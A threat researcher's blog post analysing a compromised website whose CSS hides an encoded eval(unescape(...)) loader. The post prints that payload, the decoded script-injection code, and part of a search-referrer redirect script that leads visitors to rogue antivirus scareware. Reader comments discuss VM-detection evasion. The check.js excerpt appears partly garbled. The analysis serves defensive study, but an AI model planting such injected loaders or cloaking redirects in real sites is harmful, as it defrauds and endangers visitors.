Trojan.MalScript!html
This Analysis report will explain in detail on how a Malscript is used to infect users and how this code is injected in the web server. It explains a tricky technique used by the Malware writer.
Analysis of Malscript Injected website:
Screen shot of the Website:
When users view the above website it loads all the contents of the page, more likely it loads CSS (Cascading Style Sheets) which carries the encoded malicious code. This doesn’t mean that CSS itself is malicious, but it contains a JSSS (JavaScript Style Sheets) code embedded in it.
JSSS is a jQuery plugin that allows you to take advantage of the full range of jQuery selector’s across all browsers from within your standard CSS files. The embedded malicious code is given below,
/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape(‘%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%37%32%30%31%36%33%3B%20%4A%53%53%33%20%3D%20%27%2F%64%65%6D%6F%2F%77%65%62%61%64%6D%69%6E%2F%65%64%69%74%65%75%72%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%61%71%6F%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%64%65%6D%6F%2F%77%65%62%61%64%6D%69%6E%2F%65%64%69%74%65%75%72%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%61%71%6F%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20′))) } /* a995d2cc661fa72452472e9554b5520c */
In the above code the expression “eval(unescape(string))” decodes the encoded string. When I decoded the above string I was able to see the actual code as given below.
if (!document.getElementById(‘JSSS‘))
{
JSS1 = 59;
JSS2 = 2720163;
JSS3 = ‘/demo/webadmin/editeur/lib/themes/aqo/dummy.htm’;
var js = document.createElement(‘script’);
js.setAttribute(‘src’, ‘/demo/webadmin/editeur/lib/themes/aqo/check.js’);
js.setAttribute(‘id’, ‘JSSS’);
document.getElementsByTagName(‘head’).item(0).appendChild(js)
};
What does this Code do?
The above code runs based on a specific condition given. It uses external java script file, means it downloads and runs the script to check few conditions, and may be that is why the script itself is named as check.js. And then I analyzed check.js to find the code, which is given below,
if ( (Math.random() * 60 <>|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ) {
location.href = JSS3 + ‘?r=’ + encodeURIComponent(document.referrer) + ‘&s=’ + JSS2;
};
After analyzing all the above code it was very clear for me, what the code actually does. Overall, this script checks if user contacts the website directly by typing the URL or they come through search engine. When users contact the site by typing the URL directly in the address bar it displays the actual page. But if the users come through the search engines given in the script, then it displays a different page as shown below which is hosted in the same server. The link to the fake page is “http://www.example.org /demo/webadmin/editeur/lib/themes/aqo/dummy.htm’”
The script checks for the match in the URL which should contain known search engines such as google, msn, yahoo, live, ask, dogpile, mywebsearch, yandex, rambler, aport, mail, gogo, poisk, alltheweb, fireball, freenet, abacho, wanadoo, free, club-internet, aliceadsl, alice, skynet, terra, ya, orange, clix, terravista, gratis-ting, suomi24 and then it finds other keyword matches on the URL part such as, q, query, qs, searchfor, search_for, w, p, r, key, keywords, search_string, search_word, buscar, text, words, su, qt, rdata. This script also uses Regular expression to match few random strings in the URL like (/^http:\/\/([a-z0-9_\-]+\.). This makes the script to identify whether a user comes directly to the website or comes through search engines.
And then the fake page displays a dialogue box which says “Your computer is compromised” as shown in the screen shot below,
Once I clicked on OK, it redirected me again to a different page which is where the actual reason of such attack found. The redirected page has a Explorer.exe interface which displays a fake message as threat detected and prompts me to install a Rogue Antivirus as shown in the below screen shot.
What is all behind this Technique?
These kind of techniques are mostly used in the legitimate sites which are been compromised by the hackers. When a user searches using keywords, the search engine brings websites relevant to the search. When one of these websites was already compromised by such attack the users are redirected to such fake pages. By this way the Rogue Antivirus creators earn money. Though this attack redirects to install a fake antivirus program, such stacks can also lead users to install Financial Crimeware and other stealers which could compromise the system security.
Trackback from your site.
Comments (11)
Mystery!!
| #
Hey boss!! What tool you use to analyse the HTML page?? And you use URL decoder to decode the code right??
And, i you navigated to check.js code.. you use any particular tool for that?
Btw, was just browsing through got to know ur site.. Good for beginner.. how abt joining hands with me??
Reply
Shiv
| #
There are many online tools available to decode the encoded Java scripts. Once you decode the script you can find the check.js code which checks from which search engine the user has routed from. You can use fiddler which is a web debugging tool to monitor contents downloaded from the website which I used personally. And thanks for the feedback.
Reply
Mystery!!
| #
///You can use fiddler which is a web debugging tool to monitor contents downloaded from the website which I used personally. And thanks for the feedback.///
Yeah i use the same dude!! I am reverse engineer!!!
Expect more analysis in exploits!!! and Java script and manifest files!!
I have one more question to you..!! You know nowadays most of the malware check that they are in Vm enviro so they remain dormant.. Just to know are patching the EAX to “0″ or else you use some other tech!!
- Mystery !!
Reply
Mystery!!
| #
Hey boss..
Wat not interested to reply??
I guess i asked u somethin.. You know that magic number for VM detection ;)
Reply
Mystery!!
| #
its 564d****** :) :) :) :)
Reply
Shiv - Threat Research Analyst
| #
I am extremely sorry. I just saw your previous question. I used Malzilla to decode the encoded javascript. And regards VMware spies I don’t waste time on fixing the Malware to run it in VM, instead I use real PC which I have dedicated for analysis. This would help to run and find the complete code and the behavior. And thanks for the Magic number ;-)
Reply
Mystery!!
| #
I would like to contact you through mail , just drop a mail to me so that i can reply you..
mysteryreverse@gmail.com
Reply
My Researches « Traversecode's Blog
| #
[...] Trojan.MalScript!html [...]
Reply
dragula
| #
there are a lot of ways to detect virtualization(VMware)…
Google to make things clear.
search for articles by pferrie in Virus Bulletin magazine
Reply
Shiv - Threat Research Analyst
| #
Hi Dragula.. Thanks for suggestion. Is this reply for Comment #3?
Reply
Shiv - Threat Research Analyst
| #
Thank you..
Reply